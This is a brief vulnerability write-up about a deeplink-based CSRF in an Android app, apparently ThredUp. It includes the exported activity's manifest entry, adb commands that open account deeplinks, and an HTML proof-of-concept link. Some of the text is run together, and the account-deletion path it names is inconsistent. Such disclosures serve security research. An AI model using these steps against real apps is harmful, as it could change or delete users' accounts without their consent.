CSRF Leads to Delete Account

Target: Android ApplicationDate: May , 2024Summary: I discovered a CSRF vulnerability in the Corp Android application that allows an attacker to delete user accounts by exploiting a Deeplink that interacts with the delete-account endpoint.at First we are looking into AndroidMainfast.xml <activity android:theme="@style/Theme.Thredup.Splash" android:name="com.example.android.feature.splash.SplashActivity" android:exported="true" android:launchMode="singleTask" android:screenOrientation="behind" android:configChanges="screenSize|orientation" android:noHistory="true">
<intent-filter android:autoVerify="true">
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:host="www.example.com" android:pathPrefix="/account"/>
<data android:scheme="https"/>
<data android:scheme="http"/>
</intent-filter>
</activity>We found this Deeplink with Path called /account/ after we call it using adbadb shell am start -a android.intent.action.VIEW -n example.android.feature.splash.SplashActivity -d "https://www.example.com/account/"so we are in the Settings now;wait a point what is android:pathPrefix=/account/ means ??android:pathPrefix attribute specifies a partial path that is matched against only the initial part of the path in the Intent object so maybe we can find something after /account/after intercept the API calls after Settings such as Change Password or Delete Account lets try to call it using adbadb shell am start -a android.intent.action.VIEW -n com.thredup.android/com.thredup.android.feature.splash.SplashActivity -d "https://www.example.com/account/change_password"

adb shell am start -a android.intent.action.VIEW -n com.thredup.android/com.thredup.android.feature.splash.SplashActivity -d "https://www.example.com/account/delete_password"

let’s make it as CSRF now.<!DOCTYPE html>
<html>
<a href="https://www.example.com/account/change_password">CSRF DEMO</a>
</html>POC